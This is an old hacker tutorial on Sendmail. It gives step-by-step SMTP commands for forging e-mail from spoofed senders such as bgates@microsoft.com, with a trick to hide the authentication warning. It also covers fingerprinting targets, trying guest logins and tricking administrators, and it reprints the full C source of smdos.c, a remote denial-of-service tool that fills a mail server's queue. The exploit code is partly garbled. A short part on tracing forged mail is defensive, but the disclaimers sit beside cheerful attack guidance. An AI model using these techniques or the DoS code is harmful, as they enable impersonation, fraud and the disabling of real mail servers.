|
version 2.1, 22/9/99
Converted to HTML by Penguin
Note: whenever you see something like this: blah(1),
it means that if you don't understand the meaning of the
word blah there's an explanation for it just for you,
located at the newbies corner on section 1.
Author's notes
If you have any comments or questions regarding this
tutorial (no flames or spam, please) Email me at
barakirs@netvision.net.il. Visit blacksun.box.sk for more
tutorials, free hacking/programming/unix books to download
and much more.
Disclaimer
We do not encourage any kinds of illegal activities. If you
believe that breaking the law is a good way to impress
someone, please stop reading now and grow up. There is
nothing impressive or cool in being a criminal.
Contents
Sendmail? Huh?
What is Sendmail?
What is it used for?
Why would I want to learn about Sendmail?
How do I create authentically-looking fake mails?
You mean I can send Emails from
bgates@microsoft.com or bclinton@whitehouse.org?!
Is it possible to create a 100% authentical
Email?
How can I learn raw Sendmail commands by myself?
But what if I'm lazy? Can you pleeease teach me?
How do I track down carelessly-made fake mails?
How do I track down more sophisticated fake
mails?
Can I get caught?
Will I get caught?
Hack the server? Through Sendmail?!
Can I really hack a host that runs Sendmail?
So why is Sendmail called "the buggiest daemon
on Earth" anyway?
Okay, great. Now how do I do it?
Can you tell me more about various Sendmail
security holes?
Where can I find more Sendmail security holes?
How can I tell what version of Sendmail the
target host is running?
Why should I care anyway?
How can I use the BugTraq archives to find the
holes I'm looking for?
Can I get caught?
Will I get caught?
Final Notes
Okay, so I can hack a host which runs Sendmail.
How do I do it?
* A Local DoS(29) in All Sendmail Versions Up to
8.9.3 * Bug in Sendmail's HELO command * Giant Bug in
Sendmail 8.8.4 * Final Notes
Newbies corner
What is a daemon?
What is a port?
What is a service?
What is a daemon banner?
What is a timeout (in computer terms)?
What is TCP and how does it work?
What is UDP and how does it work?
What is ICMP and how does it work?
What is an IP address?
What is a hostname?
How to find out what your ISP's mail servers
are?
What is a portscanner?
What is a services scanner?
What/who is root?
What is bandwidth?
What is a client program?
What is a DNS server?
What is Telnet (the Telnet daemon and the Telnet
program)
What is a command interpreter?
What is a shell account?
Who is a sysadmin?
What is hyper text?
What is an RFC?
What is InterNIC?
What is a sub domain (and how much does a domain
really cost?)?
What is SSH?
What is a moderated mailing list / message
board?
What is a DoS attack?
What is DUN?
What is a dial-up account?
What is a Unix password file?
What is a thread?
Appendix A: Fake Daemons
Fake Sendmail daemon
Fake Telnet daemon
Appendix B: Routing Mail
How can I route my mail?
How would that help me?
Appendix C: Faking the sender's IP
How can I fake my IP on the Email's header?
Where can I read more about this kind of stuff?
Appendix D: Reply-to
What does the Reply-to option do?
How do I use it?
Appendix E: CC and BCC
What do these commands do?
How do I use them?
References
RFC 821
Bibliography
Sam Spade's Library
Various online magazines
BugTraq's archives
Packet Storm Security
Security Focus
Rootshell
Hackersclub
Sendmail? Huh?
Sendmail is a daemon(1) which waits for connections on
port(2) 25. It is used to send outgoing mail.
For example: your Email provider (probably your ISP
(Internet Service Provider)) probably uses two servers
(unless it's a web-based mail account such as Hotmail.com):
1) mail.boring-ISP.net (probably port 110): for incoming
mail.
2) mailgw.boring-ISP.net (port 25): for outgoing mail.
Most of the time mail servers look pretty much like this,
but the addresses vary from different ISPs.
Mail.boring-ISP.net would require a username and a password
so people won't be able to read your Emails, so let's skip
this one (I might discuss cracking those passwords in
another tutorial, but remember - I'm teaching you these
things so you'll be able to know how malicious crackers work
and not fall for their tricks, not for you to break the law
and harm others). Now, as surprising as it may sound,
mailgw.boring-ISP.net will not require a password or any
other means of identification. If you telnet(19) into
mailgw.boring-ISP.net on port 25 and type in the right
commands you will be able to send fake mails. Interesting,
huh?
Now, the coolest part is that you can actually hack a
server running Sendmail or at least bring it down, since
Sendmail contains a crapload of bugs and security holes.
How
can I create authentically-looking fake mails?
As mentioned in the previous chapter, sending mail does not
require you to have an account on the machine you're sending
the mail from (the mail server, not your computer). All you
need to know is the IP Address(9) / Hostname(10) of the mail
server and Sendmail commands.
So far we assume that you know the IP/hostname of your
target. If you still don't know this important detail,
please find out(11).
Now, let's get on with it. This time, unlike previous
tutorials, I will "learn" all over again how to do
everything I describe here and walk you through the entire
process of learning and using what you have learnt.
Alright, let's begin.
Our target outgoing mail server for today is
mailgw.someone.com on port 25.
First, let's telnet into that port by either typing 'telnet
mailgw.someone.com 25' (without the quotes) on a standard
Unix text-based system, running C:\Windows\telnet.exe or
your favorite telnet application and typing in
mailgw.someone.com in the host field and 25 in the port
field, or executing your favorite telnet application from
XWindows (a graphical interface for Unix. If you're smart
enough to be running some version of Unix you shouldn't have
a hard time finding one. If you don't like the default
telnet programs you could always go to www.linuxberg.com and
grab one) and typing in the correct details (host and port).
Note about VT: you might be asked to choose a terminal type
during the connection process. Something with VT and some
number in it... hmm...
VT stands for Virtual Terminal. Since there are several
types of terminals (all sorts of monitors, old printer
terminals etc') you are asked to choose a terminal type
(compatibility issues). VT100 should suite most people just
fine.
Note about shell accounts(21): if you're not running Unix
and you wish to use Unix tools on Unix systems while you
work, telnet to nether.net on port 23, login as newuser and
get yourself a free shell account. If you'd rather user
Window's tools (I use Window's stuff when I work from
Windows, except certain conditions when I really NEED Unix
and I don't want to reboot and boot it up. In that case, I
get myself a shell account so I am able to use Unix stuff
while working from Windows) go ahead (things will work
faster since the tools are actually located on your machine,
not on some distant computer which runs a shell account),
but I still recommend that you will get a shell account at
nether.net (in fact they teach you a lot of great
Unix-newbies stuff when you sign up).
Note about Telneting from Macintosh: Macintosh does not
come with a Telnet program. However, you can download one
from: http://www.ncsa.uiuc.edu/SDG/Software/MacTelnet/
(thanks to little_v for this one!).
Now, let's see what we get after we telnet(19) to
mailgw.someone.com:25 (in this case, the character : stands
for 'on port', so
mailgw.someone.com:25 means mailgw.someone.com on port 25).
220 alpha.someone.com ESMTP Sendmail 8.9.3/8.8.6; Thu, 8
Jul 1999 21:46:04 +0000 (GMT).
AHA!
This is... this is... ugh... WHAT THE HELL IS THIS THING?!
This, my friends, is a daemon banner(4), and it just gave
us tons of valuable pieces of information!
Normally, this info is intended for a client program(16) to
determine what version of Sendmail the target is running and
how to communicate with it (the program should know that,
for example, every Sendmail version below 7.0.0 uses the
command 'halb' instead of the command 'blah', etc').
This daemon banner thing is also great for hackers and
crackers, since we can determine what version our target is
running. Later, when we will discuss about how to actually
hack the server, this data would be EXTREMELY valuable.
Okay, let's analyze what we've got...
220... we don't know what this is right now...
alpha.someone.com... no luck, can't make anything out of it
so far...
ESMTP... hmm... SMTP stands for Simple Mail Transfer
Protocol. It is the protocol(18) used by email clients to
communicate with Sendmail daemons, and this is what we're
trying to learn right now. ESMTP is Extended SMTP. It's the
same as SMTP, only it contains some more commands. Let's
leave this alone for the time being.
Sendmail 8.9.3/8.8.6 - AHA! There's something interesting.
We got the version of the Sendmail daemon! Remember this, it
will help us during the next chapter (hacking into servers
who run Sendmail). The rest is garbage (time, date, etc'
etc' etc').
Okay,
so let's move on... umm... how do I communicate with this
thing?
Er... let's try typing 'help' (without the quotes). Oh, by
the way, it is normal not to see what you type when you talk
to Sendmail since it won't send back your keystrokes. You
have to turn on "local echo" in your telnet program in order
to see what you type.
214-This is Sendmail version 8.9.3
214-Topics:
214- HELO EHLO MAIL RCPT DATA
214- RSET NOOP QUIT HELP VRFY
214- EXPN VERB ETRN DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214- sendmail-bugs@sendmail.org.
214-For local information send email to Postmaster at your
site.
214 End of HELP info
Wee!
This is cool!!
By this time you should have guessed that this number (the
220 in the daemon banner and the 214 here) is actually a
'message type'. It states the type of the message you got.
Each type of message (error because of this, error because
of that, help page for this, confirmation message for that
etc') has it's own number.
Okay, let's move on. Let's try typing 'help helo'.
214-HELO <hostname>
214- Introduce yourself.
214 End of HELP info
See? I
told you so. 214 is the message type number for help
messages.
Okay, so that way you can practically teach yourself what
every Sendmail command does. Stop right now, read all the
help pages and then continue. It is important that you'll
learn how to learn things by yourself. You might see some
notes concerning the word RFC(24) and some numbers. You can
find RFCs at http://www.linuxberg.com.
Note about ESMTP: remember that ESMTP thing we came across?
You'll be able to get a good clue on what ESMTP is by
reading the help pages. Yes, I am trying to force you to
read them... so please do. They contain tons of great
information for newbies as well as pros.
Okay, I'm assuming you've finished reading all those help
pages. Now let's move on.
First we need to enter a sender. We do this by typing 'MAIL
FROM: <fake Email address>' (remove the quotes and replace
fake Email address with the fake Email address of your
choice, say... bgates@microsoft.com (but leave the < and the
>)).
The mail server should reply with this message:
250 bgates@microsoft.com... Sender ok
Next we type 'RCPT TO: <recipient>'. Replace recipient with
the target, say victim@victim.com. We should get
250 victim@victim.com... Recipient ok
You can add recipient by simply doing this command several
times, only with different recipients.
Now, let's move on to the actual message body. Type 'data'
to start writing the body of the message.
354 Enter mail, end with "." on a line by itself
Now let's type in some stuff...
Subject: fake message (note about this line: in this line
you get to determine what subject you want to give for your
message).
Hello. This is a fake Email message.
I'm bored.
Gimme something to hack!!
.
Now we get this
250 CAA15313 Message accepted for delivery
You must be wondering right now what the heck is that
number after the 250. This is called the message ID (or
MID). It's just a stupid number, but we'll use them later...
don't you worry your pretty head about this.
Now, if you were the recepient you would have got a 100%
reliably-looking fake mail. OR IS IT?
Let's take a look at what the recepient would get...
Hmm... welp, looks like an ordinary message to me. At least
it does to the ordinary user.
Now let's look at the headers.
Headers are a couple of lines which come with every Email
address. Most of today's Email clients show only the simpler
parts of the header (sender, subject, date and time etc'),
but right now we need the full header.
On Netscape Messanger displaying the full headers is done
by going to View ==> Headers ==> All.
On Eudora this is done by clicking on the button which
displays the "blah blah blah" caption when you put your
mouse cursor above it for a second or two.
Compuserve automatically displays the full header.
On Outlook, right click the message on your inbox, choose
properties and choose details.
On pine, you should have an option somewhere in the
configuration screens that let's you choose what kind of
header you want to view (full or briefed).
Now let's take a look at the full header, shall we?
Received: from alpha.netvision.net.il
(alpha.netvision.net.il [194.90.1.13]) by
cmx.netvision.net.il (8.9.3/8.9.3) with ESMTP id CAA15313
for victim@victim.com>; Sat, 10 Jul 1999 02:49:59 +0300
(IDT)
From: bgates@microsoft.com
Received: from some.hostname.crap.com
(some.hostname.crap.com [62.0.146.225]) by alpha.someone.com
(8.9.3/8.8.6) with SMTP id CAA15313 for victim@victim.com;
Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Date: Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Message-ID: <199907092355. CAA15313@alpha.someone.com>
X-Authentication-Warning: alpha.someone.com:
some.hostname.crap.com [62.0.146.225] didn't use HELO
protocol
Subject: Fake mail
Status:
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: 3752da3b000002ff
Yeehaw! Look at all those numbers and letters and shiny
things!
Let's start from the top, shall we?
Received: from alpha.someone.com (alpha.someone.com
[194.90.1.13]) by cmx.someone.com (8.9.3/8.9.3) with ESMTP
id CAA16970 for >; Sat, 10 Jul 1999 02:49:59 +0000 (GMT)
Okay,
so the mail was received from alpha.someone.com
(alpha.someone.com [194.90.1.13]). What does that mean?
A quick checkup on InterNIC(25)'s databases (type 'whois
alpha.someone.com' without the quotes on a Unix system or
download SamSpade for Windows at www.samspade.org) reveals
that it is owned by someone.com. This is probably some kind
of a sub-server they use to send mail. Let's leave it alone,
it's not important to us right now. The (alpha.someone.com
[194.90.1.13]) part shows you the hostname(10) and the IP
address (9) of the server the Email was sent from.
Ooh, ooh, wait! Wasn't the mail supposed to be sent from
microsoft.com? I mean, the sender is bgates@microsoft.com!
If we did the mail forging thing on microsoft.com instead
of on someone.com this wouldn't have happened, now would it?
It would have seemed like an ordinary Email... from Bill
Gates... well, at least so far.
Anyway, the rest is just the MID (which we will get to
later) and the date of the message (the sending date)
according to the server which the message was sent from. The
+0000 (GMT) part means that it was sent from the Greenwich
time zone. If it was sent, for example, from the +0200 time
zone it would have meant that this time zone's time is
actually Greenwich time plus 2 hours. Find our your time
zone first so you'll be able to switch time zones and find
out when was the message sent in your time.
Now, on to more important things.
From: bgates@microsoft.com
Well, I guess this line is obvious... let's move on.
Received: from some.hostname.crap.com
(some.hostname.crap.com [62.0.146.225]) by
alpha.someone.com (8.9.3/8.8.6) with SMTP id CAA15313 for
victim@victim.com; Sat, 10 Jul 1999 02:55:46 +0300 (IDT)
Okay, now this is really interesting. Now we get the
sender's hostname and IP address.
Note about the hostname: a dial-up(31) user will have a
long and twisted hostname. For example: my hostname right
now (at least when I was writing these lines) is
RAS4-p97.hfa.netvision.net.il. Netvision.net.il is my ISP,
and the rest is mostly crap (pay close attention to the hfa
thing. Hfa stands for Haifa, which is my home town. It means
that I'm connected through Netvision's Haifa server. See?
Hostnames can be interesting).
You must have noticed by now that the hostname we got is
certainly not from microsoft.com, and that the mail server
who sent this isn't exactly microsoft.com or a microsoft
sub-domain(26) either, which clearly shows that this Email
is completely fake.
Another note about the hostname: sometimes you might not
get a hostname, but you will always get an IP address. You
can find the IP's hostname (most IP addresses do have a
hostname) by doing 'nslookup ip-address' without the quotes
on a Unix system or going to http://www.samspade.org and
using their DNS(17) Lookup Tool. If you still can't get it,
try doing a whois.
To overcome this problem, you need to do two things:
1) Send this mail from Microsoft's Sendmail server.
2) Send this mail from an account that is connected to the
web through Microsoft. If you can't get one, it will clearly
show in the headers that the mail wasn't sent from
Microsoft.
Note: nice trick to pull on someone: if your ISP is
blah.com, you can send your friends an Email from
admin@blah.com which will look 100% authentic!
Anyway, the next few characters give us the MID (Message
ID), as well as other pieces of info. I promised we'll get
to the MID, didn't I?
If you think someone is trying to trick you into thinking
he's somebody else, send an Email to abuse@your.ISP.com or
abuse@the.ISP.where.the.message.came.from.com (in this case
Microsoft.com) or abuse@the.server.who.stores.the.MID.com.
To know which server stores the MID, we'll need to skip a
few lines (two lines actually - time and date) and get
straight to this:
Message-ID: <199907092355. CAA15313@alpha.someone.com>
Aha! Look at these interesting numbers! And check this out:
CAA15313@alpha.someone.com! This means all the info
regarding the MID is stored at alpha.someone.com! Let's send
an Email to
abuse@alpha.someone.com and tell them that we think we
received a fake mail, and include the entire header. Next
thing we'll do the same with the ISP of the sender (in our
case, the sender is some.hostname.crap.com [62.0.146.225],
meaning his ISP is probably crap.com).
Now, on to the next line:
X-Authentication-Warning: alpha.someone.com:
some.hostname.crap.com [62.0.146.225] didn't use HELO
protocol
Damn! I knew we forgot something! Now let's do it all over
again, but this time we'll type HELO microsoft.com at the
beginning.
HELO microsoft.com
We get this:
250 mailgw1.netvision.net.il Hello some.hostname.crap.com
[62.0.146.225], pleased to meet you
The rest is exactly like in the last time (sender, rcpt to,
etc' etc'). Now let's see what victim@victim.com would have
gotten.
Aha! No X-Authentication-Warning!
Final
notes
I hope you enjoyed this chapter. Now you've learnt how to
play harmless and legal tricks on your friends, how to
spike-down fake mails and how easy it is to catch you if
you're trying to do illegal stuff.
Oh, and by the way, there is a way to hide your IP/hostname
when faking mail... for more information, read the second
section in the 'Okay, so I can hack a host which runs
Sendmail. How do I do it?' chapter.
Hack
the server? Through Sendmail?!
Yeah, sure, why not? I mean, EVERY service(3) is vulnerable
to some attacks. That's why it is recommended to run as less
services possible on your computer.
But the most vulnerable one is Sendmail (this is why it is
called 'the buggiest daemon on Earth' or 'the buggiest
daemon on the planet'). A member of the mailing list once
told me that he just can't wait to read the Sendmail
Tutorial (this was before this tutorial has been released)
and that he himself runs Sendmail on his computer. Running
Sendmail on a personal computer is unnecessary and
dangerous. If your computer does not act as a mail server,
there is no reason for you to run Sendmail (unless you want
people to be able to send mail to
your-account@your.IP.address instead of
your-account@your.ISP.com. Note about your-account: in the
first address, your-account is the name of your username on
your own computer (Unix users should know what I am talking
about). In the second address, your-account is your username
at your ISP).
Note: the information in this chapter can be either used to
hack servers, or the other way around - to protect your
server. Please don't break the law, or at least don't spew
out my name during the investigations... hehe...
Okay, so the first thing we have to do in order to hack a
server through a specific service (or to improve the
security of a specific server) is it's (the service's)
version. This can be easily done by viewing the daemon
banner(4). Suppose we came across a computer that runs
Sendmail 8.8.3 (which was quite old when this tutorial was
written, meaning there should be a couple of bugs here.
Sendmail is upgraded mostly when a new bug is found. In
fact, everything except of the daemon's security is rarely
changed during upgrades).
Next thing we'll try to determine the OS (Operating System)
which this daemon runs on. If Sendmail's banner won't tell
us, the Telnet(19) daemon will. First telnet to port 23 and
cross your fingers. If there's a daemon on that port, it's
probably the Telnet daemon, and it'll probably give you the
name and version of the OS. If not, you can either:
1) Try looking for a guest account (username: guest,
password: guest or username: newuser, password: newuser),
since some systems give you these details only after you log
in.
2) Email admin@your-target.com and ask him (I recommend
opening a mailbox on one of those free mailbox services such
as Hotmail and Emailing him from there, since some
admins(22) might get a little suspicious...).
3) Try going to your target's website. This kind of
information might be there, somewhere.
If you still didn't find the OS, fear not! We might still
be able to do a cool hack without this information, but
still this information might come in handy, so do all you
can to get your hands on it.
Next thing, you browse some online databases until you find
the hole you've been looking for. First of all I'll explain
about the largest and most recommended online databases, and
then I'll teach you how to search them, plus some valuable
concepts and words you need to get familiar with.
Packet
Storm Security
URL: http://packetstorm.securify.com.
One of the largest online databases for security-related
information. I recommend going there once a day and reading
the 'New Files Today' section, whether you're looking for
specific holes or not.
The archive was founded by Ken Williams and gets hundreds
of thousands of hits per week.
It has recently been transferred into the ownership of
Kroll-O-Nagra (www.securify.com).
Security Focus
URL: http://www.securityfocus.com.
Another comprehensive database. Updated daily. These guys
never sleep!
BugTraq
URL: hosted by Security Focus
(http://www.securityfocus.com), previously hosted by
Netspace
(http://www.netspace.org).
BugTraq is one of the best security mailing list out there.
The list is moderated, meaning that if you find a new
security hole, you can only send your message to the
moderator, Aleph1 (aleph1@underground.org). Aleph1 filters
out all the spam, lame messages and old bugs and posts only
the good ones to the list.
I recommend signing up at http://www.securityfocus.com. You
can also search their archive, which is by the way my
favorite security-related database, by going to
securityfocus.com and looking for a link called 'search'.
Searching
If we are looking for a bug in Sendmail 8.8.3, we'll need
to type the following search keywords: 'sendmail 8.8.3'
(without the quotes). If we're looking for something
specific, such as a local DoS(29) attack against any version
of sendmail, we will use the following search keywords:
'local DoS sendmail', etc'.
Searching Packet Storm
Packet Storm should have a search box somewhere (Ken
changes the layout every now and then so I can't give you
the exact location of the box). You can divide the search
results you will get into two categories: texts and
programs.
For example: you searched for a specific hole and you got a
couple of text files and a couple of programs. The text
files explain about the bugs and how to exploit it, while
the programs use the hole to get in.
These programs are often called 'exploits' and usually come
as a source code instead of as a binary file. Let me
explain: a binary file is any file that isn't made of text.
Executable files are usually binary files. Now, in our case,
programs come as sources instead of binary. Sources are in
the form of plain text, and they're actually a bunch of
commands. When given to a compiler, this source code turns
into an executable binary (except for source codes written
in the Perl programming language, which can be executed in
the form of sources if you have the right program). Anyway,
these programs come in the form of sources so you will be
able to understand how they work instead of blindly running
them.
Searching Security Focus
Security Focus offers more organized information. Instead
of various bits of information, Security Focus offers
articles. These include exact definitions of the bug, where
and when it should happen, work-arounds (how to solve it)
etc'. The only backdrop in Security Focus is that it is
smaller than other databases.
BugTraq
Ah... my favorite database. When people post something to
BugTraq about a security hole they found, other people can
reply to them and share their side of the story. For
example: did it work on their computer too, how to fix the
bug in various ways, what causes the bug in the first place
etc'. You can compile a full database with all of the
necessary information by simply reading a couple of posts.
Getting Caught
If you're planning on doing something bad, please don't.
You can get caught. Better crackers than you already got
caught. Don't be stupid.
Okay, so I can hack a host which runs Sendmail. Now how do
I do it?
I have made a nice list with several security holes
regarding Sendmail just to give you the hang of it.
A Local DoS(29) in All Sendmail Versions Up to 8.9.3 (taken
from Packet Storm)
Date: Sat, 3 Apr 1999 00:42:56 +0200
From: "[iso-8859-2] Michał Szymański" <siwa9@BOX43.GNET.PL>
To: BUGTRAQ@netspace.org
Subject: Re: Possible local DoS in sendmail
Hi folks,
This local queue filling DoS attack in sendmail is quite
dangerous. But good
security policy (like mine) will prevent attackers from
doing such things.
Control files (in /var/spool/mqueue) created by 'sendmail
-t' are owned by
root.attacker's_group; turn on quotas for group
'attacker's_group' on the
file system containing /var/spool/mqueue directory, and
your host will be not
vulnerable; but you _have to_ configure your sendmail as
_nosuid_ daemon;
Much more dangerous are remote queue filling DoS attacks.
If you have enabled
relaying, you can use shown below smdos.c proggie; it will
quite fast fullfill
partition on disk where /var/spool/mqueue resides. you
should notice increased
LA during attack; in contrast to local DoS attacks, control
files created by
smdos.c are owned by root.root, so ... it's much more
difficult to prevent
offenders from doing it;
don't forget to change BSIZE definition (in smdos.c) to
appropriate victim's
host message size limitation (MaxMessageSize option); you
can also increase
MAXCONN definition.
smdos.c:
--- CUT HERE ---
/*
By Michal Szymanski <siwa9@box43.gnet.pl>
Sendmail DoS (up to 8.9.3);
Sat Apr 3 00:12:31 CEST 1999
*/
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>
#undef VERBOSE /* define it, if MORECONN is undefined */
#define MORECONN
// #define RCPT_TO "foo@ftp.onet.pl"
#define RCPT_TO "foo@10.255.255.255"
#ifdef MORECONN
#define MAXCONN 5
#endif
#define BSIZE 1048576 /* df* control file size */
#define PORT 25
char buffer[BSIZE];
int sockfd,x,loop,chpid;
void usage(char *fname) {
fprintf(stderr,"Usage: %s <victim_host>\n",fname);
exit(1);
}
void say(char *what) {
if (write(sockfd,what,strlen(what))<0) {
perror("write()");
exit(errno);
}
#ifdef VERBOSE
fprintf(stderr,"<%s",what);
#endif
bzero(buffer,BSIZE);
usleep(1000);
if (read(sockfd,buffer,BSIZE)<0) {
perror("read()");
exit(errno);
}
#ifdef VERBOSE
fprintf(stderr,buffer);
#endif
}
int main(int argc,char *argv[]) {
struct sockaddr_in serv_addr;
struct hostent *host;
char *hostname,hostaddr[20];
fprintf(stderr,"Sendmail DoS (up to 8.9.3) by siwa9
[siwa9@box43.gnet.pl]\n");
if (argc<2) usage(argv[0]);
#ifdef VERBOSE
fprintf(stderr,">Preparing address. \n");
#endif
hostname=argv[1];
serv_addr.sin_port=htons(PORT);
serv_addr.sin_family=AF_INET;
if ((serv_addr.sin_addr.s_addr=inet_addr(hostname))==-1) {
#ifdef VERBOSE
fprintf(stderr,">Getting info from DNS.\n");
#endif
if ((host=gethostbyname(hostname))==NULL) {
herror("gethostbyname()");
exit(h_errno);
}
serv_addr.sin_family=host->h_addrtype;
bcopy(host->h_addr,(char
*)&serv_addr.sin_addr,host->h_length);
#ifdef VERBOSE
fprintf(stderr,">Official name of host:
%s\n",host->h_name);
#endif
hostname=host->h_name;
sprintf(hostaddr,"%d.%d.%d.%d",(unsigned
char)host->h_addr[0],
(unsigned char)host->h_addr[1],
(unsigned char)host->h_addr[2],
(unsigned char)host->h_addr[3]);
}
else sprintf(hostaddr,"%s",hostname);
#ifdef MORECONN
for (;loopBR (!(chpid="fork()))" if> #endif
for(;;) {
bzero(&(serv_addr.sin_zero),8);
if ((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1) {
perror("socket()");
exit(errno);
}
if ((connect(sockfd,(struct sockaddr
*)&serv_addr,sizeof(serv_addr))) == -1) {
perror("connect()");
exit(errno);
}
#ifdef VERBOSE
fprintf(stderr,">Connected to [%s:%d].\n",hostname,PORT);
#endif
bzero(buffer,BSIZE);read(sockfd,buffer,BSIZE);
#ifdef VERBOSE
fprintf(stderr,buffer);
#else
fprintf(stderr,".");
#endif
say("helo foo\n");
say("mail from:root@localhost\n");
say("rcpt to:" RCPT_TO "\n");
say("data\n");
for (x=0;x<=BSIZE;x++)
buffer[x]='X';write(sockfd,buffer,BSIZE);
say("\n.\n");
sleep(1);
say("quit\n");
shutdown(sockfd,2);
close(sockfd);
#ifdef VERBOSE
fprintf(stderr,">Connection closed succesfully.\n");
#endif
}
#ifdef MORECONN
}
waitpid(chpid,NULL,0);
#endif
return 0;
}
--- CUT HERE ---
|